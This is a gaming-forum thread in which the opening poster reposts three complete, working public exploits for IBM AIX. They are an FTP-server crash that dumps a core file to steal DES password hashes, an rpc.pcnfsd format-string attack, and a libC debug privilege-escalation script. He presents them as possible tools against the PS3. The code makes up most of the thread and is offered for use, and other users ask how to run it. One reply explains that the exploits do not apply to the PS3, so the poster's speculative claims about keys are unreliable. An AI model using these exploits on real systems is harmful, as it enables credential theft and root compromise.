Sponsored Links

Sponsored Links

Page 1 of 2 12 LastLast
Results 1 to 10 of 12



  1. #1
    Banned User Luckluka's Avatar
    Join Date
    Jan 2010
    Posts
    146
    Sponsored Links

    Lightbulb Aix Exploit for PS3

    Sponsored Links
    Hi, im quite popular on the Computer-hacking forums and i wanted to share something with you that "MAYBE" help in pwning the PS3s protection

    I remember people said that ps3 maybe running "AIX" well what i got here is a "AIX 5l FTPd Remote DES Hash Exploit for allver. including the datacenter edition"

    C0DE UNCOMPILED!

    Code:
    /*
     * IBM AIX 5l FTPd Remote DES Hash Exploit -- Advanced 'Datacenter' Edition :>
     *
     * Should work on IBM AIX 5.1,5.2,5.3! probably on 4.X too
     *
     * bug found & exploited by Kingcope
     *
     * Version 2.0 - July 2010
     * ----------------------------------------------------------------------------
     * Description:                                                               -
     * The AIX 5l FTP-Server crashes when an overly long NLST command is supplied -
     * For example: NLST ~AAAAA...A (2000 As should be enough)                   -
     * The fun part here is that it creates a coredump file in the current        -
     * directory if it is set writable by the logged in user.                     -
     * The goal of the exploit is to get the DES encrypted user hashes            -
     * off the server. These can be later cracked with JtR.                       -
     * This is accomplished by populating the memory with logins of the user      -
     * we would like the encrypted hash from. Logging in three times with the     -
     * target username should be enough so that the DES hash is included in the   -
     * 'core' file.                                                               -
     * The FTPd banner looks like below.                                          -
     * 220 AIX5l FTP-Server (Version 4.1 Tue May 29 11:57:21 CDT 2001) ready.     -
     * 220 AIX5l FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready.      -
     * ----------------------------------------------------------------------------
     */
     
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <fcntl.h>
     
    int createconnection(char *target, char *targetport);
    void getline(int s);
    void putline(int s, char *out);
    void usage(char *exe);
     
    char in[8096];
    char out[8096];
     
    int main(int argc, char *argv[])
    {
     extern int optind;
     extern char *optarg;
     int haveuser=0,havepassword=0;
     int s,s2,nsock;
     int c,k,len;
     int fd;
     
     char *target = NULL;
     char *username = "ftp";
     char *password = "guest";
     char *writeto = "pub";
     char *crackme = "root";
     char *targetport = "21";
     int uselist = 0;
     char *myip = NULL;
     char *as = NULL;
     int octet_in[4], port;
     struct sockaddr_in yo, cli;
     char *oct = NULL;
     
     while ((c = getopt(argc, argv, "h:i:p:l:k:d:c:s")) != EOF) {
      switch(c) {
      case 'h':
        target = (char*)malloc(strlen(optarg)+1);
        strcpy(target, optarg);
      break;
      case 'i':
        myip = (char*)malloc(strlen(optarg)+1);
        strcpy(myip, optarg);
      break;
      case 'p':
        targetport = (char*)malloc(strlen(optarg)+1);
        strcpy(targetport, optarg);
      break;
      case 'l':
        username = (char*)malloc(strlen(optarg)+1);
        strcpy(username, optarg);
        haveuser = 1;
      break;
      case 'k':
        password = (char*)malloc(strlen(optarg)+1);
        strcpy(password, optarg);
        havepassword = 1;
      break;
      case 'd':
        writeto = (char*)malloc(strlen(optarg)+1);
        strcpy(writeto, optarg);
      break;
      case 'c':
        crackme = (char*)malloc(strlen(optarg)+1);
        strcpy(crackme, optarg);
      break;
      case 's':
        uselist = 1;
      break;
      default:
        usage(argv[0]);
      }
     }
     
     if (target == NULL || myip == NULL)
      usage(argv[0]);
     
     if ((haveuser && !havepassword) || (!haveuser && havepassword)) {
      usage(argv[0]);
     }
     
     s = createconnection(target, targetport);
     getline(s);
     
     fprintf(stderr, "populating DES hash in memory...\n");
     
     for (k=0;k<3;k++) {
      snprintf(out, sizeof out, "USER %s\r\n", crackme);
      putline(s, out);
      getline(s);
      snprintf(out, sizeof out, "PASS abcdef\r\n");
      putline(s,out);
      getline(s);
     }
     
     fprintf(stderr, "logging in...\n");
     
     snprintf(out, sizeof out, "USER %s\r\n", username);
     putline(s, out);
     getline(s);
     snprintf(out, sizeof out, "PASS %s\r\n", password);
     putline(s,out);
     getline(s);
     getline(s);
     
     fprintf(stderr, "changing directory...\n");
     
     snprintf(out, sizeof out, "CWD %s\r\n", writeto);
     putline(s, out);
     getline(s);
     
     fprintf(stderr, "triggering segmentation violation...\n");
     
     as = (char*)malloc(2000);
     memset(as, 'A', 2000);
     as[2000-1]=0;
     
     if (!uselist) {
      snprintf(out, sizeof out, "NLST ~%s\r\n", as);
     } else {
      /* AIX 5.3 trigger - thanks to karol */
      snprintf(out, sizeof out, "LIST ~%s\r\n", as);
     }
     putline(s, out);
     
     memset(in, '\0', sizeof in);
     if (recv(s, in, sizeof in, 0) < 1) {
      printf("trigger succeeded!\nwaiting for core file to be created...\n");
     } else {
      printf("trigger seems to have failed, proceeding anyways...\n"
      "\nwaiting for core file to be created...\n");
     }
     
     sleep(5);
     
     close(s);
     
     s = createconnection(target, targetport);
     getline(s);
     
     fprintf(stderr, "logging in 2nd time...\n");
     
     snprintf(out, sizeof out, "USER %s\r\n", username);
     putline(s, out);
     getline(s);
     snprintf(out, sizeof out, "PASS %s\r\n", password);
     putline(s,out);
     getline(s);
     getline(s);
     
     fprintf(stderr, "changing directory...\n");
     
     snprintf(out, sizeof out, "CWD %s\r\n", writeto);
     putline(s, out);
     getline(s);
     
     fprintf(stderr, "getting core file...\n");
     
     snprintf(out, sizeof out, "TYPE I\r\n");
     putline(s, out);
     getline(s);
     
     port = getpid() + 1024;
     len = sizeof(cli);
     
     bzero(&yo, sizeof(yo));
     yo.sin_family = AF_INET;
     yo.sin_port=htons(port);
     yo.sin_addr.s_addr = htonl(INADDR_ANY);
     
     oct=(char *)strtok(myip,".");
     octet_in[0]=atoi(oct);
     oct=(char *)strtok(NULL,".");
     octet_in[1]=atoi(oct);
     oct=(char *)strtok(NULL,".");
     octet_in[2]=atoi(oct);
     oct=(char *)strtok(NULL,".");
     octet_in[3]=atoi(oct);
     
     snprintf(out, sizeof out, "PORT %d,%d,%d,%d,%d,%d\r\n", octet_in[0], octet_in[1], octet_in[2], octet_in[3], port / 256, port % 256);
     putline(s, out);
     getline(s);
     
     if ((s2=socket(AF_INET, SOCK_STREAM, 0)) < 0) {
      perror("socket");
      return -1;
     }
     
     if ((bind(s2, (struct sockaddr *) &yo, sizeof(yo))) < 0) {
      perror("bind");
      close(s2);
      exit(1);
     }
     
     if (listen(s2, 10) < 0) {
      perror("listen");
      close(s2);
      exit(1);
     }
     
     snprintf(out, sizeof out, "RETR core\r\n");
     putline(s, out);
     getline(s);
     if (strstr(in, "150") == NULL) {
      fprintf(stderr, "core file not found... terminating.\n");
      close(s);
      exit(1);
     }
     
     fd = open("core", O_WRONLY | O_CREAT);
     if (fd == -1) {
      perror("open on local core file");
      close(s);
      exit(1);
     }
     
     sleep(1);
     
     if ((nsock = accept(s2, (struct sockaddr *)&cli, &len)) < 0) {
      perror("accept");
      close(s);
      exit(1);
     }
     
     do {
      k = recv(nsock, in, sizeof in, 0);
      if (k < 1) break;
      write(fd, in, k);
     } while (k > 0);
     
     close(nsock);
     close(fd);
     close(s);
     
     fprintf(stderr, "finally extracting DES hashes from core file for user '%s'...\n", crackme);
     system("strings core | grep '^[A-Za-z0-9]\\{13\\}$'");
     
     fprintf(stderr, "done.\n");
     return 0;
    }
     
    int createconnection(char *target, char *targetport) {
     struct addrinfo hints, *res;
     int s;
     
     memset(&hints, 0, sizeof hints);
     hints.ai_family = AF_UNSPEC;
     hints.ai_socktype = SOCK_STREAM;
     
     if (getaddrinfo(target, targetport, &hints, &res)) {
      perror("getaddrinfo");
      exit(1);
     }
     
     s = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
     if (s < 0) {
      perror("socket");
      exit(1);  
     }
     
     if (connect(s, res->ai_addr, res->ai_addrlen) < 0) {
      perror("connect");
      exit(1);
     }
     
     return s;
    }
     
    void getline(int s)
    {
     memset(in, '\0', sizeof in);
     if (recv(s, in, sizeof in, 0) < 1) {
      perror("recv");
      close(s);
      exit(1);
     }
     
     fprintf(stderr, "<\t%s", in);
    }
     
    void putline(int s, char *out) {
     fprintf(stderr, ">\t%s", out);
     
     if (send(s, out, strlen(out), 0) == -1) {
      perror("send");
      close(s);
      exit(1);
     }
    }
     
    void usage(char *exe)
    {
     fprintf(stderr, "%s <-h host> <-i your internal ip> [-p port] [-l username] [-k password]"
     " [-d writable directory] [-c user to crack] [-s use 'LIST' command on AIX 5.3]\n",
    exe);
     exit(0);
    }
    You will freaky LOVE IT!

    It can dump the corefile in a directory and it can dump a DES KEY!

    UPDATE2:
    RPC AIX EXPLOIT!:
    Code:
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    #include <rpc/rpc.h>
     
    #define PCNFSD_PROG 150001
    #define PCNFSD_VERS 1
    #define PCNFSD_PR_INIT 2
    #define PCNFSD_PR_START 3
     
    struct cm_send {
       char *s1;
       char *s2;
    };
     
    struct cm_send2 {
       char *s1;
       char *s2;
    };
     
    struct cm_reply {
       int i;
    };
     
    bool_t xdr_cm_send(XDR *xdrs, struct cm_send *objp)
    {
       if(!xdr_wrapstring(xdrs, &objp->s1))
          return (FALSE);
       if(!xdr_wrapstring(xdrs, &objp->s2))
           return (FALSE);
     
       return (TRUE);
    }
     
    bool_t xdr_cm_send2(XDR *xdrs, struct cm_send2 *objp)
    {
       if(!xdr_wrapstring(xdrs, &objp->s1))
          return (FALSE);
       if(!xdr_wrapstring(xdrs, &objp->s2))
           return (FALSE);
     
       return (TRUE);
    }
     
    bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply *objp)
    {
       if(!xdr_int(xdrs, &objp->i))
          return (FALSE);
       return (TRUE);
    }
     
    int
    main(int argc, char *argv[])
    {
       long ret, offset;
       int len, x, y, i;
       char *hostname, *b;
     
       CLIENT *cl;
       struct cm_send send;
       struct cm_send2 send2;
       struct cm_reply reply;
       struct timeval tm = { 10, 0 };
       enum clnt_stat stat;
     
       printf("-= rpc.pcnfsd remote format string exploit, tested against AIX 6.1.0 and lower =-\n");
       printf("-= Check Point Software Technologies - Vulnerability Discovery Team (VDT) =-\n");
       printf("-= Rodrigo Rubira Branco <rbranco *noSPAM* checkpoint.com> =-\n\n");
     
     
       if(argc < 2) {
          printf("Usage: %s [hostname]\n", argv[0]);
          exit(1);
       }
     
       hostname = argv[1];
     
       send.s1 = "AAAA%n%n%n%n%n%n%n%n%n"; // Create the dir on /var/spool/pcnfs
       send.s2 = "";
       send2.s1 = "AAAA%n%n%n%n%n%n%n%n%n";// Call the dir to trigger fmt bug
       send2.s2 = "";
     
       printf("\nSending PCNFSD_PR_INIT to the server ... ");
     
       if(!(cl=clnt_create(hostname,PCNFSD_PROG,PCNFSD_VERS,"udp"))){
            clnt_pcreateerror("\nerror");exit(-1);
       }
       stat=clnt_call(cl, PCNFSD_PR_INIT, xdr_cm_send, (caddr_t) &send,
                            xdr_cm_reply, (caddr_t) &reply, tm);
     
       clnt_destroy(cl);
     
       printf("done!\n");
     
       printf("Sending PCNFSD_PR_START procedure ... ");
     
       if(!(cl=clnt_create(hostname,PCNFSD_PROG,PCNFSD_VERS,"udp"))){
            clnt_pcreateerror("\nerror");exit(-1);
       }
     
       cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
       stat=clnt_call(cl, PCNFSD_PR_START, xdr_cm_send2, (caddr_t) &send2,
                            xdr_cm_reply, (caddr_t) &reply, tm);
     
       printf("done!\n");
       clnt_destroy(cl);
     
    }
    (I got good disasm skills, if someone wants)

    Another EXPLOIT: PRIVELAGE ESCALATION: AIX

    Code:
    #!/bin/sh
     
    #
    # $Id: raptor_libC,v 1.1 2009/09/10 15:08:04 raptor Exp $
    #
    # raptor_libC - AIX arbitrary file overwrite via libC debug
    # Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>
    #
    # Property of @ Mediaservice.net Srl Data Security Division
    # http://www.mediaservice.net/ http://lab.mediaservice.net/
    #
    # *** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
    #
    # A certain debugging component in IBM AIX 5.3 and 6.1 does not properly handle
    # the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE environment variables, which
    # allows local users to gain privileges by leveraging a setuid-root program to
    # create an arbitrary root-owned file with world-writable permissions, related
    # to libC.a (aka the XL C++ runtime library) in AIX 5.3 and libc.a in AIX 6.1
    # (CVE-2009-2669).
    #
    # Typical privilege escalation techniques via arbitrary file creation don't
    # seem to work on recent AIX versions: .rhosts is ignored if it is group or
    # world writable; LIBPATH and LDR_PRELOAD have no effect for setuid binaries;
    # /var/spool/cron/atjobs seems useless as well, since we cannot open cron's
    # named pipe /var/adm/cron/FIFO. Other viable exploitation vectors that come
    # to mind, depending on the target box setup, are: /root/.ssh/authorized_keys,
    # /root/{.profile,.kshrc}, and /etc/rc.d/rc2.d.
    #
    # See also: http://milw0rm.com/exploits/9306
    #
    # Usage:
    # $ uname -a
    # AIX rs6000 3 5 0052288E4C00
    # $ lslpp -L xlC.rte | grep xlC.rte
    # xlC.rte                    9.0.0.1    C     F    XL C/C++ Runtime
    # $ chmod +x raptor_libC
    # $ ./raptor_libC /bin/bobobobobob
    # [...]
    # -rw-rw-rw-   1 root     staff            63 Sep 10 09:55 /bin/bobobobobob
    #
    # Vulnerable platforms (AIX 5.3):
    # xlC.rte < 8.0.0.0      [untested]
    # xlC.rte 8.0.0.0-8.0.0.14  [untested]
    # xlC.rte 9.0.0.0-9.0.0.9   [tested]
    # xlC.rte 10.1.0.0-10.1.0.2 [untested]
    #
    # Vulnerable platforms (AIX 6.1):
    # bos.rte.libc 6.1.0.0-6.1.0.11 [untested]
    # bos.rte.libc 6.1.1.0-6.1.1.6  [untested]
    # bos.rte.libc 6.1.2.0-6.1.2.5  [untested]
    # bos.rte.libc 6.1.3.0-6.1.3.2  [untested]
    # bos.adt.prof 6.1.0.0-6.1.0.10 [untested]
    # bos.adt.prof 6.1.1.0-6.1.1.5  [untested]
    # bos.adt.prof 6.1.2.0-6.1.2.4  [untested]
    # bos.adt.prof 6.1.3.0-6.1.3.1  [untested]
    #
     
    echo "raptor_libC - AIX arbitrary file overwrite via libC debug"
    echo "Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>"
    echo
     
    # check the arguments
    if [ -z "$1" ]; then
        echo "*** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***"
        echo
        echo "Usage: $0 <filename>"
        echo
        exit
    fi
     
    # prepare the environment
    _LIB_INIT_DBG=1
    _LIB_INIT_DBG_FILE=$1
    export _LIB_INIT_DBG _LIB_INIT_DBG_FILE
     
    # gimme -rw-rw-rw-!
    umask 0
     
    # setuid program linked to /usr/lib/libC.a
    /usr/dt/bin/dtappgather
     
    # other good setuid targets
    # /usr/dt/bin/dtprintinfo
    # /opt/IBMinvscout/bin/invscoutClient_VPD_Survey
     
    # check the created file
    ls -l $_LIB_INIT_DBG_FILE
    echo
    Last edited by Luckluka; 08-17-2010 at 03:38 PM Reason: Automerged Doublepost

  2. #2
    Registered User biotechhh's Avatar
    Join Date
    Feb 2010
    Posts
    12
    Sponsored Links
    Sponsored Links
    is this BS ?? what you can do with this ?

  3. #3
    Senior Member TUHTA's Avatar
    Join Date
    Sep 2008
    Posts
    323
    Sponsored Links
    Sponsored Links
    Quote Originally Posted by luckluka View Post
    Hi, im quite popular on the Computer-hacking forums and i wanted to share something with you that "MAYBE" help in pwning the PS3s protection

    I remember people said that ps3 maybe running "AIX" well what i got here is a "AIX 5l FTPd Remote DES Hash Exploit for allver. including the datacenter edition"

    C0DE UNCOMPILED!
    well look, any methods how to run it? Just compile it and run thru Linux Bash?

  4. #4
    Registered User Bahamut's Avatar
    Join Date
    Apr 2006
    Posts
    2
    Sponsored Links
    Sponsored Links
    this looks interesting, maybe some other master knows more about this?

  5. #5
    Registered User xUb3rn00dlEx's Avatar
    Join Date
    Dec 2009
    Posts
    174
    Anyone care to elaborate on the possibilities of what this might do? Can you run the exploit?

  6. #6
    Senior Member Pcsx2006's Avatar
    Join Date
    Feb 2009
    Posts
    326
    Well this indeed looks very very intresting, fabulous work bro.

  7. #7
    Registered User blood911's Avatar
    Join Date
    Sep 2006
    Posts
    32
    hopefully some of the geniuses on this site use some of your genius to help hack this thing

  8. #8
    Banned User Luckluka's Avatar
    Join Date
    Jan 2010
    Posts
    146
    If someone manages to run this exploit thru geohot's they might actually execute it and get CORE Files (COREOS) DECRYPTED and a DES KEY (Which sounds to me as the masterkey) but i'm 85% sure i'm wrong about the DES KEY.

  9. #9
    Registered User Dibblah's Avatar
    Join Date
    Oct 2005
    Posts
    36
    First is an FTPd exploit. The PS3 does not run a FTP server.
    Second is a portmapper exploit. The PS3 has no NFS / ... server.
    The third requires a shell on AIX with a standard libc. I have seen no evidence of either being available.

    (The mention of DES keys here is related to logon credentials, which again do not exist on the PS3)

    Unfortunately, nothing to see here, move along

  10. #10
    Banned User Luckluka's Avatar
    Join Date
    Jan 2010
    Posts
    146
    DemonHades (i think) confirmed PS3 running on AIX.

 

Sponsored Links

Page 1 of 2 12 LastLast
Affiliates - Contact Us - PS3 Downloads - Privacy Statement - Site Rules - Top - © 2014 PlayStation 3 News